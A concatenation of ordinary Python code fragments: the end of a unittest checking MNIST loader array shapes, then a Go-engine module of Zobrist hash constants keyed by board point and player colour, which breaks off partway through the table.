path="C:\\Users\\Admin_2\\Google Drive\\DataSets")
s = np.shape(img)
self.assertEqual(len(s), 3)
self.assertEqual(s[0], 60000)
self.assertEqual(s[1], 28)
self.assertEqual(s[2], 28)
s = np.shape(lbl)
self.assertEqual(len(s), 1)
self.assertEqual(s[0], 60000)
return
#
# Execute the UnitTests.
#
if __name__ == "__main__":
tests = TestMNISTLoader()
suite = unittest.TestLoader().loadTestsFromModule(tests)
unittest.TextTestRunner().run(suite)
| 1,872 | 685 |
from .gotypes import Player, Point
__all__ = ['HASH_CODE', 'EMPTY_BOARD']
HASH_CODE = {
(Point(row=1, col=1), Player.black): 5769035980899136028,
(Point(row=1, col=1), Player.white): 4195353792250980257,
(Point(row=1, col=2), Player.black): 2939556709560817954,
(Point(row=1, col=2), Player.white): 7708149279972756940,
(Point(row=1, col=3), Player.black): 7988678547803188226,
(Point(row=1, col=3), Player.white): 4655957553841539011,
(Point(row=1, col=4), Player.black): 8212044857501010895,
(Point(row=1, col=4), Player.white): 4872061569365492854,
(Point(row=1, col=5), Player.black): 2379681802598189143,
(Point(row=1, col=5), Player.white): 6864125290938038514,
(Point(row=1, col=6), Player.black): 5167707775397193164,
(Point(row=1, col=6), Player.white): 7743213685658051850,
(Point(row=1, col=7), Player.black): 2222727314644120210,
(Point(row=1, col=7), Player.white): 427285564481781851,
(Point(row=1, col=8), Player.black): 6107598394475672768,
(Point(row=1, col=8), Player.white): 6307049205504825109,
(Point(row=1, col=9), Player.black): 6874945384043361005,
(Point(row=1, col=9), Player.white): 3732564701787158093,
(Point(row=1, col=10), Player.black): 3883381806354027664,
(Point(row=1, col=10), Player.white): 7060016586773584112,
(Point(row=1, col=11), Player.black): 4174985115031737431,
(Point(row=1, col=11), Player.white): 8930518714559891444,
(Point(row=1, col=12), Player.black): 3893048938418591093,
(Point(row=1, col=12), Player.white): 7841147957307715476,
(Point(row=1, col=13), Player.black): 8516544479021506378,
(Point(row=1, col=13), Player.white): 2783921672633682732,
(Point(row=1, col=14), Player.black): 1191345934938865717,
(Point(row=1, col=14), Player.white): 6911192133451606875,
(Point(row=1, col=15), Player.black): 2519872149991678056,
(Point(row=1, col=15), Player.white): 8561768391883077189,
(Point(row=1, col=16), Player.black): 6884539456222258472,
(Point(row=1, col=16), Player.white): 5355059437980732087,
(Point(row=1, col=17), Player.black): 6060464869033661655,
(Point(row=1, col=17), Player.white): 5614909820479001861,
(Point(row=1, col=18), Player.black): 3787301363732739064,
(Point(row=1, col=18), Player.white): 4975010203534354120,
(Point(row=1, col=19), Player.black): 4624130766194895106,
(Point(row=1, col=19), Player.white): 5296415352916558483,
(Point(row=2, col=1), Player.black): 8830643134143001245,
(Point(row=2, col=1), Player.white): 7250367917558052665,
(Point(row=2, col=2), Player.black): 8708716694644165206,
(Point(row=2, col=2), Player.white): 4944601016522489638,
(Point(row=2, col=3), Player.black): 2924412846921872712,
(Point(row=2, col=3), Player.white): 8270637900583140993,
(Point(row=2, col=4), Player.black): 2237197181614672186,
(Point(row=2, col=4), Player.white): 1457486289196979118,
(Point(row=2, col=5), Player.black): 3193682865604242403,
(Point(row=2, col=5), Player.white): 6907561651011366711,
(Point(row=2, col=6), Player.black): 7562139104010148646,
(Point(row=2, col=6), Player.white): 644177766712470342,
(Point(row=2, col=7), Player.black): 1849636870230193624,
(Point(row=2, col=7), Player.white): 4262074061500750718,
(Point(row=2, col=8), Player.black): 7046352651358370609,
(Point(row=2, col=8), Player.white): 725075218925363539,
(Point(row=2, col=9), Player.black): 2936893550308581851,
(Point(row=2, col=9), Player.white): 8013681660331642168,
(Point(row=2, col=10), Player.black): 231201466957437056,
(Point(row=2, col=10), Player.white): 4586538242774448548,
(Point(row=2, col=11), Player.black): 7417156086330733955,
(Point(row=2, col=11), Player.white): 5709088051075674894,
(Point(row=2, col=12), Player.black): 465763212277965423,
(Point(row=2, col=12), Player.white): 3218025695418009095,
(Point(row=2, col=13), Player.black): 6127325164692593481,
(Point(row=2, col=13), Player.white): 7158040026257574189,
(Point(row=2, col=14), Player.black): 5807819310182877254,
(Point(row=2, col=14), Player.white): 2357640313516560837,
(Point(row=2, col=15), Player.black): 4392161512180678464,
(Point(row=2, col=15), Player.white): 5109997213166995568,
(Point(row=2, col=16), Player.black): 5140506148394224314,
(Point(row=2, col=16), Player.white): 3144375931646556770,
(Point(row=2, col=17), Player.black): 4684159959070068387,
(Point(row=2, col=17), Player.white): 4343207205761436375,
(Point(row=2, col=18), Player.black): 8614722190417309898,
(Point(row=2, col=18), Player.white): 2108512489805245428,
(Point(row=2, col=19), Player.black): 2492604824966279150,
(Point(row=2, col=19), Player.white): 5284943168978586313,
(Point(row=3, col=1), Player.black): 6687736921226174162,
(Point(row=3, col=1), Player.white): 3033026816527371392,
(Point(row=3, col=2), Player.black): 7807767080953708,
(Point(row=3, col=2), Player.white): 8904849863552960659,
(Point(row=3, col=3), Player.black): 8624685131842709143,
(Point(row=3, col=3), Player.white): 2258480536733385455,
(Point(row=3, col=4), Player.black): 1846270564501507004,
(Point(row=3, col=4), Player.white): 6957287679008487447,
(Point(row=3, col=5), Player.black): 7574591243884459255,
(Point(row=3, col=5), Player.white): 6936980838498116621,
(Point(row=3, col=6), Player.black): 9041336246058590868,
(Point(row=3, col=6), Player.white): 1243006310742637368,
(Point(row=3, col=7), Player.black): 2030412760449406396,
(Point(row=3, col=7), Player.white): 6746733001722822212,
(Point(row=3, col=8), Player.black): 5516725271195575475,
(Point(row=3, col=8), Player.white): 6871907922252452884,
(Point(row=3, col=9), Player.black): 7988789914006526853,
(Point(row=3, col=9), Player.white): 4992865987635107091,
(Point(row=3, col=10), Player.black): 1287049815926143285,
(Point(row=3, col=10), Player.white): 7230341405235329595,
(Point(row=3, col=11), Player.black): 9170686368021133813,
(Point(row=3, col=11), Player.white): 5983613942214390568,
(Point(row=3, col=12), Player.black): 3680920048319877524,
(Point(row=3, col=12), Player.white): 1868642379829096041,
(Point(row=3, col=13), Player.black): 4577756177226098183,
(Point(row=3, col=13), Player.white): 6482949555716818546,
(Point(row=3, col=14), Player.black): 4432260459496503522,
(Point(row=3, col=14), Player.white): 134287453159092786,
(Point(row=3, col=15), Player.black): 6748597881968077794,
(Point(row=3, col=15), Player.white): 8304978460888895085,
(Point(row=3, col=16), Player.black): 5034832418858488579,
(Point(row=3, col=16), Player.white): 5867831665303543268,
(Point(row=3, col=17), Player.black): 8637644441019934841,
(Point(row=3, col=17), Player.white): 2218345499919583684,
(Point(row=3, col=18), Player.black): 1868740838611032911,
(Point(row=3, col=18), Player.white): 790388399063124043,
(Point(row=3, col=19), Player.black): 7258777126631351725,
(Point(row=3, col=19), Player.white): 8311567588415987017,
(Point(row=4, col=1), Player.black): 8655871657246391142,
(Point(row=4, col=1), Player.white): 4003570665308894924,
(Point(row=4, col=2), Player.black): 1534335101597226060,
(Point(row=4, col=2), Player.white): 267487761651261389,
(Point(row=4, col=3), Player.black): 4223543087760139203,
(Point(row=4, col=3), Player.white): 182109920959310,
(Point(row=4, col=4), Player.black): 8084107767590670313,
(Point(row=4, col=4), Player.white): 8255748124676625790,
(Point(row=4, col=5), Player.black): 3895136419213143922,
(Point(row=4, col=5), Player.white): 5717824502593724541,
(Point(row=4, col=6), Player.black): 4568987985832857882,
(Point(row=4, col=6), Player.white): 7859221258306423825,
(Point(row=4, col=7), Player.black): 9092556190419510056,
(Point(row=4, col=7), Player.white): 6521782839350825899,
(Point(row=4, col=8), Player.black): 1983705540554708178,
(Point(row=4, col=8), Player.white): 5980370895146848165,
(Point(row=4, col=9), Player.black): 8655187985569625378,
(Point(row=4, col=9), Player.white): 1543612971427466247,
(Point(row=4, col=10), Player.black): 4924869653703577346,
(Point(row=4, col=10), Player.white): 8266635585980953678,
(Point(row=4, col=11), Player.black): 2650000752898571353,
(Point(row=4, col=11), Player.white): 1409035678742917605,
(Point(row=4, col=12), Player.black): 1260398788900668280,
(Point(row=4, col=12), Player.white): 749836172628892870,
(Point(row=4, col=13), Player.black): 735222828603024315,
(Point(row=4, col=13), Player.white): 389175700405472516,
(Point(row=4, col=14), Player.black): 7750583341552576950,
(Point(row=4, col=14), Player.white): 1084583276510855981,
(Point(row=4, col=15), Player.black): 8950223508066684513,
(Point(row=4, col=15), Player.white): 3394313087104282258,
(Point(row=4, col=16), Player.black): 4035202993116651489,
(Point(row=4, col=16), Player.white): 6444753666473218234,
(Point(row=4, col=17), Player.black): 6191091259124973151,
(Point(row=4, col=17), Player.white): 4568661774202931640,
(Point(row=4, col=18), Player.black): 8377152653943623717,
(Point(row=4, col=18), Player.white): 281053282493097273,
(Point(row=4, col=19), Player.black): 722312087170941568,
(Point(row=4, col=19), Player.white): 3770416326773712553,
(Point(row=5, col=1), Player.black): 881568007992847126,
(Point(row=5, col=1), Player.white): 1071479720133150263,
(Point(row=5, col=2), Player.black): 2734842616646461308,
(Point(row=5, col=2), Player.white): 5892272072509084584,
(Point(row=5, col=3), Player.black): 7452892003632361433,
(Point(row=5, col=3), Player.white): 175455556324312167,
(Point(row=5, col=4), Player.black): 9122918462680814030,
(Point(row=5, col=4), Player.white): 7275574168578359815,
(Point(row=5, col=5), Player.black): 8768791668149437127,
(Point(row=5, col=5), Player.white): 1967856787282759876,
(Point(row=5, col=6), Player.black): 6604284198424850968,
(Point(row=5, col=6), Player.white): 1174154004537023726,
(Point(row=5, col=7), Player.black): 6452192423795075276,
(Point(row=5, col=7), Player.white): 3541795513621095011,
(Point(row=5, col=8), Player.black): 1379518575672960476,
(Point(row=5, col=8), Player.white): 736020849783721871,
(Point(row=5, col=9), Player.black): 2383331116205637426,
(Point(row=5, col=9), Player.white): 9036004825775330000,
(Point(row=5, col=10), Player.black): 1694282667018465060,
(Point(row=5, col=10), Player.white): 758572437702507525,
(Point(row=5, col=11), Player.black): 2908242914232441245,
(Point(row=5, col=11), Player.white): 2142578331638016033,
(Point(row=5, col=12), Player.black): 3225462241019099222,
(Point(row=5, col=12), Player.white): 1002875481627407613,
(Point(row=5, col=13), Player.black): 2214504485761078962,
(Point(row=5, col=13), Player.white): 8216379778152464841,
(Point(row=5, col=14), Player.black): 5375796855652168678,
(Point(row=5, col=14), Player.white): 329860269971523138,
(Point(row=5, col=15), Player.black): 7886091177195383982,
(Point(row=5, col=15), Player.white): 797819299044829558,
(Point(row=5, col=16), Player.black): 6466347384990221784,
(Point(row=5, col=16), Player.white): 6905427095442339981,
(Point(row=5, col=17), Player.black): 5553887868700183760,
(Point(row=5, col=17), Player.white): 2024303718996643653,
(Point(row=5, col=18), Player.black): 2268405412180982822,
(Point(row=5, col=18), Player.white): 8579819472103256939,
(Point(row=5, col=19), Player.black): 1487737534858655612,
(Point(row=5, col=19), Player.white): 1184467737056931418,
(Point(row=6, col=1), Player.black): 61002440362941735,
(Point(row=6, col=1), Player.white): 4901792894231739612,
(Point(row=6, col=2), Player.black): 8046731073102176345,
(Point(row=6, col=2), Player.white): 5985205458497701577,
(Point(row=6, col=3), Player.black): 6585429054420854987,
(Point(row=6, col=3), Player.white): 3819740592142356174,
(Point(row=6, col=4), Player.black): 4108234244147519861,
(Point(row=6, col=4), Player.white): 253627228817355965,
(Point(row=6, col=5), Player.black): 3868800318384240802,
(Point(row=6, col=5), Player.white): 2783904588459497971,
(Point(row=6, col=6), Player.black): 4996704236644226891,
(Point(row=6, col=6), Player.white): 3944869574058700771,
(Point(row=6, col=7), Player.black): 9062875838227781187,
(Point(row=6, col=7), Player.white): 5205881991777395348,
(Point(row=6, col=8), Player.black): 3753904443000638174,
(Point(row=6, col=8), Player.white): 3911447964081555885,
(Point(row=6, col=9), Player.black): 6249187897693375630,
(Point(row=6, col=9), Player.white): 6766154033107228322,
(Point(row=6, col=10), Player.black): 2937577797378456600,
(Point(row=6, col=10), Player.white): 561700528830587831,
(Point(row=6, col=11), Player.black): 2139634236825316312,
(Point(row=6, col=11), Player.white): 4963573584552823594,
(Point(row=6, col=12), Player.black): 7055991601690284531,
(Point(row=6, col=12), Player.white): 3426039060394626150,
(Point(row=6, col=13), Player.black): 4553988720258523568,
(Point(row=6, col=13), Player.white): 2871751622729869916,
(Point(row=6, col=14), Player.black): 4427697958201878411,
(Point(row=6, col=14), Player.white): 7487346359005374192,
(Point(row=6, col=15), Player.black): 4798775123725289136,
(Point(row=6, col=15), Player.white): 2173034517007185759,
(Point(row=6, col=16), Player.black): 7862288536745854735,
(Point(row=6, col=16), Player.white): 4671207854001703523,
(Point(row=6, col=17), Player.black): 1825335494099951543,
(Point(row=6, col=17), Player.white): 4121129076466827577,
(Point(row=6, col=18), Player.black): 6436046063825483859,
(Point(row=6, col=18), Player.white): 1834900058002436833,
(Point(row=6, col=19), Player.black): 3311430872804768965,
(Point(row=6, col=19), Player.white): 7093693406397094845,
(Point(row=7, col=1), Player.black): 4416485833806275197,
(Point(row=7, col=1), Player.white): 5993208992595429873,
(Point(row=7, col=2), Player.black): 5738471850928603526,
(Point(row=7, col=2), Player.white): 2830817747590138158,
(Point(row=7, col=3), Player.black): 2049678311127187953,
(Point(row=7, col=3), Player.white): 1932137151241309826,
(Point(row=7, col=4), Player.black): 1284436241322849671,
(Point(row=7, col=4), Player.white): 959331834338762764,
(Point(row=7, col=5), Player.black): 1698232794071722157,
(Point(row=7, col=5), Player.white): 1500018031169518662,
(Point(row=7, col=6), Player.black): 6309046003087442398,
(Point(row=7, col=6), Player.white): 5124403861392948132,
(Point(row=7, col=7), Player.black): 8557161202716387521,
(Point(row=7, col=7), Player.white): 482659382834075915,
(Point(row=7, col=8), Player.black): 7243993118660063854,
(Point(row=7, col=8), Player.white): 7869935430995650068,
(Point(row=7, col=9), Player.black): 1000281396074482607,
(Point(row=7, col=9), Player.white): 6297071952110244007,
(Point(row=7, col=10), Player.black): 4244408650697127458,
(Point(row=7, col=10), Player.white): 1077927145063207720,
(Point(row=7, col=11), Player.black): 7644383986516919589,
(Point(row=7, col=11), Player.white): 5539105510784036476,
(Point(row=7, col=12), Player.black): 4843660928143156500,
(Point(row=7, col=12), Player.white): 7835615502700745042,
(Point(row=7, col=13), Player.black): 6653458592888229760,
(Point(row=7, col=13), Player.white): 608623951719446882,
(Point(row=7, col=14), Player.black): 1792490758753159288,
(Point(row=7, col=14), Player.white): 3842170905282003864,
(Point(row=7, col=15), Player.black): 5523875932800630513,
(Point(row=7, col=15), Player.white): 175888417098849283,
(Point(row=7, col=16), Player.black): 8044924535185994069,
(Point(row=7, col=16), Player.white): 5793447474918626947,
(Point(row=7, col=17), Player.black): 6520459195516472973,
(Point(row=7, col=17), Player.white): 8392728481711258360,
(Point(row=7, col=18), Player.black): 4465391501229234548,
(Point(row=7, col=18), Player.white): 6773263707028048535,
(Point(row=7, col=19), Player.black): 4488224987414049576,
(Point(row=7, col=19), Player.white): 8652577587208692758,
(Point(row=8, col=1), Player.black): 3004723972424860711,
(Point(row=8, col=1), Player.white): 6688090241666099884,
(Point(row=8, col=2), Player.black): 173852074517437683,
(Point(row=8, col=2), Player.white): 1255512452365432108,
(Point(row=8, col=3), Player.black): 3644060836071363132,
(Point(row=8, col=3), Player.white): 2608781899807400496,
(Point(row=8, col=4), Player.black): 6767891026415985248,
(Point(row=8, col=4), Player.white): 3467324763608485490,
(Point(row=8, col=5), Player.black): 6089341814248388360,
(Point(row=8, col=5), Player.white): 7888854541547534044,
(Point(row=8, col=6), Player.black): 6867328208650830718,
(Point(row=8, col=6), Player.white): 3254996933602040882,
(Point(row=8, col=7), Player.black): 3132634440751793234,
(Point(row=8, col=7), Player.white): 9223192912662878517,
(Point(row=8, col=8), Player.black): 8461849134586001501,
(Point(row=8, col=8), Player.white): 6785052822319298229,
(Point(row=8, col=9), Player.black): 316486289063193398,
(Point(row=8, col=9), Player.white): 2678944512943086531,
(Point(row=8, col=10), Player.black): 6112436031466420565,
(Point(row=8, col=10), Player.white): 481484487812476999,
(Point(row=8, col=11), Player.black): 5558780098474617227,
(Point(row=8, col=11), Player.white): 4515498643014124320,
(Point(row=8, col=12), Player.black): 3148254704783107576,
(Point(row=8, col=12), Player.white): 1132925046259482032,
(Point(row=8, col=13), Player.black): 3867794393643156094,
(Point(row=8, col=13), Player.white): 3430593453848991583,
(Point(row=8, col=14), Player.black): 3808487281108483352,
(Point(row=8, col=14), Player.white): 8558528698193351352,
(Point(row=8, col=15), Player.black): 1221859996451008953,
(Point(row=8, col=15), Player.white): 8348828709569243206,
(Point(row=8, col=16), Player.black): 9201324552950804067,
(Point(row=8, col=16), Player.white): 1448578628667060036,
(Point(row=8, col=17), Player.black): 1454827388443741974,
(Point(row=8, col=17), Player.white): 8057275312324248471,
(Point(row=8, col=18), Player.black): 7325702097722803218,
(Point(row=8, col=18), Player.white): 5140847388271146314,
(Point(row=8, col=19), Player.black): 6756098593295647931,
(Point(row=8, col=19), Player.white): 7991832158773563518,
(Point(row=9, col=1), Player.black): 2539290635541201805,
(Point(row=9, col=1), Player.white): 8437611497531923952,
(Point(row=9, col=2), Player.black): 852452633754271273,
(Point(row=9, col=2), Player.white): 323074703916458579,
(Point(row=9, col=3), Player.black): 9131703106000486321,
(Point(row=9, col=3), Player.white): 8764904479550868077,
(Point(row=9, col=4), Player.black): 3096840760956633597,
(Point(row=9, col=4), Player.white): 5814507543016751268,
(Point(row=9, col=5), Player.black): 2379792443241085277,
(Point(row=9, col=5), Player.white): 6396796748033360003,
(Point(row=9, col=6), Player.black): 1782231465241809120,
(Point(row=9, col=6), Player.white): 345767461848252606,
(Point(row=9, col=7), Player.black): 2874613619832946383,
(Point(row=9, col=7), Player.white): 2294607763040053819,
(Point(row=9, col=8), Player.black): 5178250685268040999,
(Point(row=9, col=8), Player.white): 3364679157508528694,
(Point(row=9, col=9), Player.black): 3553967243152693124,
(Point(row=9, col=9), Player.white): 3068058057478630282,
(Point(row=9, col=10), Player.black): 6184238169682215319,
(Point(row=9, col=10), Player.white): 532168233786036918,
(Point(row=9, col=11), Player.black): 3092733305208152615,
(Point(row=9, col=11), Player.white): 8489026477172734834,
(Point(row=9, col=12), Player.black): 8466596885845881353,
(Point(row=9, col=12), Player.white): 233550669275107378,
(Point(row=9, col=13), Player.black): 8603581440897487625,
(Point(row=9, col=13), Player.white): 9034915872764336272,
(Point(row=9, col=14), Player.black): 8064684217439572746,
(Point(row=9, col=14), Player.white): 5194590206921700316,
(Point(row=9, col=15), Player.black): 4306432062946416892,
(Point(row=9, col=15), Player.white): 2309616088345580816,
(Point(row=9, col=16), Player.black): 8258188514420365838,
(Point(row=9, col=16), Player.white): 6138395356060930650,
(Point(row=9, col=17), Player.black): 6672053316594332959,
(Point(row=9, col=17), Player.white): 3638024551847104885,
(Point(row=9, col=18), Player.black): 5720854717145016673,
(Point(row=9, col=18), Player.white): 1549651879493766372,
(Point(row=9, col=19), Player.black): 5340785436349693495,
(Point(row=9, col=19), Player.white): 2405856358043503939,
(Point(row=10, col=1), Player.black): 6012164709255398847,
(Point(row=10, col=1), Player.white): 812907851686256787,
(Point(row=10, col=2), Player.black): 7949402815097777999,
(Point(row=10, col=2), Player.white): 4758655524963025727,
(Point(row=10, col=3), Player.black): 2008566195663888707,
(Point(row=10, col=3), Player.white): 5225240679930537767,
(Point(row=10, col=4), Player.black): 6015740187305539517,
(Point(row=10, col=4), Player.white): 4186688677666698354,
(Point(row=10, col=5), Player.black): 5719852225235663443,
(Point(row=10, col=5), Player.white): 826011302979319411,
(Point(row=10, col=6), Player.black): 8242258740436620776,
(Point(row=10, col=6), Player.white): 6778969168835768563,
(Point(row=10, col=7), Player.black): 1649291342741470337,
(Point(row=10, col=7), Player.white): 8384196651020892748,
(Point(row=10, col=8), Player.black): 3219805316829239618,
(Point(row=10, col=8), Player.white): 6596907969102854814,
(Point(row=10, col=9), Player.black): 962723493104342355,
(Point(row=10, col=9), Player.white): 8968650977280178689,
(Point(row=10, col=10), Player.black): 1468664499759050832,
(Point(row=10, col=10), Player.white): 914485010029843310,
(Point(row=10, col=11), Player.black): 8501539474215164558,
(Point(row=10, col=11), Player.white): 8798578597941390750,
(Point(row=10, col=12), Player.black): 329776455727647811,
(Point(row=10, col=12), Player.white): 6706312749522123953,
(Point(row=10, col=13), Player.black): 9203013348898942872,
(Point(row=10, col=13), Player.white): 1188765220685651133,
(Point(row=10, col=14), Player.black): 912994098216386387,
(Point(row=10, col=14), Player.white): 1842201333713261434,
(Point(row=10, col=15), Player.black): 6041960408571691593,
(Point(row=10, col=15), Player.white): 6450489929744294489,
(Point(row=10, col=16), Player.black): 1169223709141443575,
(Point(row=10, col=16), Player.white): 1357962677395804436,
(Point(row=10, col=17), Player.black): 4646077370747128681,
(Point(row=10, col=17), Player.white): 3704161794426167131,
(Point(row=10, col=18), Player.black): 4573468167625885166,
(Point(row=10, col=18), Player.white): 6511588956916800774,
(Point(row=10, col=19), Player.black): 4329635167829691310,
(Point(row=10, col=19), Player.white): 4923893081858853917,
(Point(row=11, col=1), Player.black): 4811888116128159477,
(Point(row=11, col=1), Player.white): 718588455940040384,
(Point(row=11, col=2), Player.black): 7674812639233200986,
(Point(row=11, col=2), Player.white): 4331023918212183699,
(Point(row=11, col=3), Player.black): 3897432141041501556,
(Point(row=11, col=3), Player.white): 7276519453137688286,
(Point(row=11, col=4), Player.black): 6510030071580938266,
(Point(row=11, col=4), Player.white): 8357803872914616079,
(Point(row=11, col=5), Player.black): 1733557852229300439,
(Point(row=11, col=5), Player.white): 1887858117103523412,
(Point(row=11, col=6), Player.black): 2050309162712522735,
(Point(row=11, col=6), Player.white): 5134667517624134734,
(Point(row=11, col=7), Player.black): 1935323196572736143,
(Point(row=11, col=7), Player.white): 823776149897020121,
(Point(row=11, col=8), Player.black): 5183697550720478054,
(Point(row=11, col=8), Player.white): 2806161877752714854,
(Point(row=11, col=9), Player.black): 639365824564049855,
(Point(row=11, col=9), Player.white): 3105484068242501121,
(Point(row=11, col=10), Player.black): 8892143254196528380,
(Point(row=11, col=10), Player.white): 5166469057964800694,
(Point(row=11, col=11), Player.black): 292605160015608161,
(Point(row=11, col=11), Player.white): 7514567951599881472,
(Point(row=11, col=12), Player.black): 5109949366761472505,
(Point(row=11, col=12), Player.white): 310762339342946547,
(Point(row=11, col=13), Player.black): 2104946795875927320,
(Point(row=11, col=13), Player.white): 1235460730147809452,
(Point(row=11, col=14), Player.black): 2127497427209123011,
(Point(row=11, col=14), Player.white): 7161002026604519025,
(Point(row=11, col=15), Player.black): 59233478003238444,
(Point(row=11, col=15), Player.white): 5970353674800714203,
(Point(row=11, col=16), Player.black): 6665616474731630602,
(Point(row=11, col=16), Player.white): 152650024831436796,
(Point(row=11, col=17), Player.black): 934842009288313548,
(Point(row=11, col=17), Player.white): 8355856797725665648,
(Point(row=11, col=18), Player.black): 1477828799968727451,
(Point(row=11, col=18), Player.white): 2901806850750856486,
(Point(row=11, col=19), Player.black): 7573653378761984057,
(Point(row=11, col=19), Player.white): 7716881570339655225,
(Point(row=12, col=1), Player.black): 2568918803525316736,
(Point(row=12, col=1), Player.white): 5628114972944723995,
(Point(row=12, col=2), Player.black): 4423011986110571904,
(Point(row=12, col=2), Player.white): 1004637634072591177,
(Point(row=12, col=3), Player.black): 5461707783998271703,
(Point(row=12, col=3), Player.white): 638790804607383716,
(Point(row=12, col=4), Player.black): 2724719862170090354,
(Point(row=12, col=4), Player.white): 4421566525462598702,
(Point(row=12, col=5), Player.black): 8648906312566693100,
(Point(row=12, col=5), Player.white): 8270055473898685871,
(Point(row=12, col=6), Player.black): 1915749061367669068,
(Point(row=12, col=6), Player.white): 4876832281198499170,
(Point(row=12, col=7), Player.black): 46140495477523623,
(Point(row=12, col=7), Player.white): 5007714131133085886,
(Point(row=12, col=8), Player.black): 8743444844221333325,
(Point(row=12, col=8), Player.white): 908456928534611497,
(Point(row=12, col=9), Player.black): 6983096771564974099,
(Point(row=12, col=9), Player.white): 7430779576557722399,
(Point(row=12, col=10), Player.black): 3152448216524677614,
(Point(row=12, col=10), Player.white): 3180436423603504440,
(Point(row=12, col=11), Player.black): 5269207326232247596,
(Point(row=12, col=11), Player.white): 9212597296607879019,
(Point(row=12, col=12), Player.black): 7233784749342434823,
(Point(row=12, col=12), Player.white): 5359592143185856960,
(Point(row=12, col=13), Player.black): 4245159514132041091,
(Point(row=12, col=13), Player.white): 7483203165114225163,
(Point(row=12, col=14), Player.black): 2594209199301730105,
(Point(row=12, col=14), Player.white): 4330511663839218487,
(Point(row=12, col=15), Player.black): 1756401805040965301,
(Point(row=12, col=15), Player.white): 8443740481163251139,
(Point(row=12, col=16), Player.black): 8532686399133135373,
(Point(row=12, col=16), Player.white): 8648108130553396024,
(Point(row=12, col=17), Player.black): 9029748126466626304,
(Point(row=12, col=17), Player.white): 366767265422515200,
(Point(row=12, col=18), Player.black): 5634370494228795321,
(Point(row=12, col=18), Player.white): 3028166990928692045,
(Point(row=12, col=19), Player.black): 6128886499703201992,
(Point(row=12, col=19), Player.white): 7223805971713766564,
(Point(row=13, col=1), Player.black): 2496253901433903144,
(Point(row=13, col=1), Player.white): 1551493066650163627,
(Point(row=13, col=2), Player.black): 2672840148010019750,
(Point(row=13, col=2), Player.white): 5994868224347809475,
(Point(row=13, col=3), Player.black): 4628383235437429108,
(Point(row=13, col=3), Player.white): 6064829097099335572,
(Point(row=13, col=4), Player.black): 5413486961964612412,
(Point(row=13, col=4), Player.white): 4045128829439945174,
(Point(row=13, col=5), Player.black): 4712295427500302995,
(Point(row=13, col=5), Player.white): 248402942764617862,
(Point(row=13, col=6), Player.black): 999667821658964017,
(Point(row=13, col=6), Player.white): 8820974176258972514,
(Point(row=13, col=7), Player.black): 3476986111144434482,
(Point(row=13, col=7), Player.white): 7942783663244623527,
(Point(row=13, col=8), Player.black): 4234845736483310370,
(Point(row=13, col=8), Player.white): 4216551395056226649,
(Point(row=13, col=9), Player.black): 177265600322039330,
(Point(row=13, col=9), Player.white): 8990080846893998186,
(Point(row=13, col=10), Player.black): 3147286474627477037,
(Point(row=13, col=10), Player.white): 6471007499395169134,
(Point(row=13, col=11), Player.black): 1936045838813747550,
(Point(row=13, col=11), Player.white): 4644151093964356408,
(Point(row=13, col=12), Player.black): 4435131806849743185,
(Point(row=13, col=12), Player.white): 54569717782380574,
(Point(row=13, col=13), Player.black): 1508359860504878315,
(Point(row=13, col=13), Player.white): 6891830587880295481,
(Point(row=13, col=14), Player.black): 3762684221329973240,
(Point(row=13, col=14), Player.white): 3017599301607054197,
(Point(row=13, col=15), Player.black): 7503851802710739479,
(Point(row=13, col=15), Player.white): 2388026796289288600,
(Point(row=13, col=16), Player.black): 4460949656925498045,
(Point(row=13, col=16), Player.white): 6121498320763557205,
(Point(row=13, col=17), Player.black): 5454912114241197983,
(Point(row=13, col=17), Player.white): 5677909618846838515,
(Point(row=13, col=18), Player.black): 5464352961587447142,
(Point(row=13, col=18), Player.white): 7114550787615396229,
(Point(row=13, col=19), Player.black): 3485712230029563806,
(Point(row=13, col=19), Player.white): 6446897201405604194,
(Point(row=14, col=1), Player.black): 7528920080599778132,
(Point(row=14, col=1), Player.white): 5669940686033599629,
(Point(row=14, col=2), Player.black): 5228752949828262741,
(Point(row=14, col=2), Player.white): 4897727087692140998,
(Point(row=14, col=3), Player.black): 8331520318636135471,
(Point(row=14, col=3), Player.white): 6240564650456223273,
(Point(row=14, col=4), Player.black): 4147571497243833121,
(Point(row=14, col=4), Player.white): 5287851769372107454,
(Point(row=14, col=5), Player.black): 3929856055856918635,
(Point(row=14, col=5), Player.white): 4942395218791830311,
(Point(row=14, col=6), Player.black): 3419131812142225330,
(Point(row=14, col=6), Player.white): 3946706912536054517,
(Point(row=14, col=7), Player.black): 2216854722824718528,
(Point(row=14, col=7), Player.white): 5751840383776158854,
(Point(row=14, col=8), Player.black): 6039954508464465971,
(Point(row=14, col=8), Player.white): 4880067768099333403,
(Point(row=14, col=9), Player.black): 1391277164658920957,
(Point(row=14, col=9), Player.white): 7451285533597502911,
(Point(row=14, col=10), Player.black): 9114931203345433206,
(Point(row=14, col=10), Player.white): 9151177955674363973,
(Point(row=14, col=11), Player.black): 5286716825816304093,
(Point(row=14, col=11), Player.white): 8299991677645306266,
(Point(row=14, col=12), Player.black): 5195464055129666925,
(Point(row=14, col=12), Player.white): 7360092883003763047,
(Point(row=14, col=13), Player.black): 8091126652869256455,
(Point(row=14, col=13), Player.white): 859632643926738720,
(Point(row=14, col=14), Player.black): 1956576428005199048,
(Point(row=14, col=14), Player.white): 3373854362230632022,
(Point(row=14, col=15), Player.black): 6142182356819019331,
(Point(row=14, col=15), Player.white): 599882345282402750,
(Point(row=14, col=16), Player.black): 6495330481411294612,
(Point(row=14, col=16), Player.white): 4678318561357907878,
(Point(row=14, col=17), Player.black): 1613163634528474933,
(Point(row=14, col=17), Player.white): 2149394070598892722,
(Point(row=14, col=18), Player.black): 3613731393981415918,
(Point(row=14, col=18), Player.white): 670492166825950545,
(Point(row=14, col=19), Player.black): 3576884676864696223,
(Point(row=14, col=19), Player.white): 8013845603496590037,
(Point(row=15, col=1), Player.black): 4444720605802559994,
(Point(row=15, col=1), Player.white): 4690308037902459056,
(Point(row=15, col=2), Player.black): 198794688626774049,
(Point(row=15, col=2), Player.white): 754101414028084990,
(Point(row=15, col=3), Player.black): 9031834267182088450,
(Point(row=15, col=3), Player.white): 4955142136487065963,
(Point(row=15, col=4), Player.black): 5950356114654535765,
(Point(row=15, col=4), Player.white): 1673708508551501787,
(Point(row=15, col=5), Player.black): 3059942019337751169,
(Point(row=15, col=5), Player.white): 6236001435181494065,
(Point(row=15, col=6), Player.black): 3840642542836249231,
(Point(row=15, col=6), Player.white): 4494437239109309561,
(Point(row=15, col=7), Player.black): 3418524991248282035,
(Point(row=15, col=7), Player.white): 4088710049109644123,
